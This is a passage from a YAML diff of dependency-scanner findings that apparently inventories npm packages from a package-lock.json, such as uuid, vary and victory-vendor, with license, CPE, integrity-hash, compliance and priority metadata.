+ priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a01b70906be81bf9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: typedarray 0.0.6' + title: typedarray 0.0.6 + description: 'Package discovered: typedarray 0.0.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e635ba578a775ab5 + name: typedarray + version: 0.0.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/typedarray@0.0.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz + integrity: sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 730b4341f8da3a62 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: undici-types 6.21.0' + title: undici-types 6.21.0 + description: 'Package discovered: undici-types 6.21.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9968e425c772df9f + name: undici-types + version: 6.21.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/undici-types@6.21.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz + integrity: sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a49eb5c706dbb178 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: unicode-properties 1.4.1' + title: unicode-properties 1.4.1 + description: 'Package discovered: unicode-properties 1.4.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 541fbe3121e73dce + name: unicode-properties + version: 1.4.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/unicode-properties@1.4.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz + integrity: sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg== + dependencies: + base64-js: ^1.3.0 + unicode-trie: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d33b9ca7e3f48cc1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: unicode-trie 2.0.0' + title: unicode-trie 2.0.0 + description: 'Package discovered: unicode-trie 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: aac566dbf0b492ea + name: unicode-trie + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/unicode-trie@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz + integrity: sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ== + dependencies: + pako: ^0.2.5 + tiny-inflate: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4121fde58e5100ef + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: unpipe 1.0.0' + title: unpipe 1.0.0 + description: 'Package discovered: unpipe 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 294cc6dab10e14ff + name: unpipe + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/unpipe@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz + integrity: sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0c87db67edbd6edf + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: update-browserslist-db 1.2.3' + title: update-browserslist-db 1.2.3 + description: 'Package discovered: update-browserslist-db 1.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7776752fe1d43a3e + name: update-browserslist-db + version: 1.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/update-browserslist-db@1.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz + integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w== + dependencies: + escalade: ^3.2.0 + picocolors: ^1.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1ae47d19bb25f29a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: util-deprecate 1.0.2' + title: util-deprecate 1.0.2 + description: 'Package discovered: util-deprecate 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: aac5900c84ec45ff + name: util-deprecate + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/util-deprecate@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz + integrity: sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ea9355f8957e8bab + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: utils-merge 1.0.1' + title: utils-merge 1.0.1 + description: 'Package discovered: utils-merge 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4f715b1e9b38109a + name: utils-merge + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/utils-merge@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz + integrity: sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 236364fea165c402 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: uuid 10.0.0' + title: uuid 10.0.0 + description: 'Package discovered: uuid 10.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 21b622d3d64a2c86 + name: uuid + version: 10.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/uuid@10.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz + integrity: sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2fb790bc55d11030 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: uuid 8.3.2' + title: uuid 8.3.2 + description: 'Package discovered: uuid 8.3.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8cf0c19ede45d1bc + name: uuid + version: 8.3.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/uuid@8.3.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz + integrity: sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3e2f0913d0055c91 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: uuid 9.0.1' + title: uuid 9.0.1 + description: 'Package discovered: uuid 9.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0bd59342bab05265 + name: uuid + version: 9.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/uuid@9.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz + integrity: sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4e3576c544465abd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: vary 1.1.2' + title: vary 1.1.2 + description: 'Package discovered: vary 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2fc27b955ce3ef5d + name: vary + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/vary@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/vary/-/vary-1.1.2.tgz + integrity: sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 60e43c65d8e9a8e6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: victory-vendor 36.9.2' + title: victory-vendor 36.9.2 + description: 'Package discovered: victory-vendor 36.9.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 14c55cee8eb4e77f + name: victory-vendor + version: 36.9.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT AND ISC + spdxExpression: MIT AND ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/victory-vendor@36.9.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz + integrity: sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ== + dependencies: + '@types/d3-array': ^3.0.3 + '@types/d3-ease': ^3.0.0 + '@types/d3-interpolate': ^3.0.1 + '@types/d3-scale': ^4.0.2 + '@types/d3-shape': ^3.1.0 + '@types/d3-time': ^3.0.0 + '@types/d3-timer': ^3.0.0 + d3-array: ^3.1.6 + d3-ease: ^3.0.1 + d3-interpolate: ^3.0.1 + d3-scale: ^4.0.2 + d3-shape: ^3.1.0 + d3-time: ^3.0.0 + d3-timer: ^3.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a846a040ec49fd72 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: vite-compatible-readable-stream 3.6.1' + title: vite-compatible-readable-stream 3.6.1 + description: 'Package discovered: vite-compatible-readable-stream 3.6.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 874d0721c00b1770 + name: vite-compatible-readable-stream + version: 3.6.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/vite-compatible-readable-stream@3.6.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz + integrity: sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ== + dependencies: + inherits: ^2.0.3 + string_decoder: ^1.1.1 + util-deprecate: ^1.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c6d0b110f80cc969 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: webidl-conversions 3.0.1' + title: webidl-conversions 3.0.1 + description: 'Package discovered: webidl-conversions 3.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 770e2f7ad3b1c524 + name: webidl-conversions + version: 3.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-2-Clause + spdxExpression: BSD-2-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - 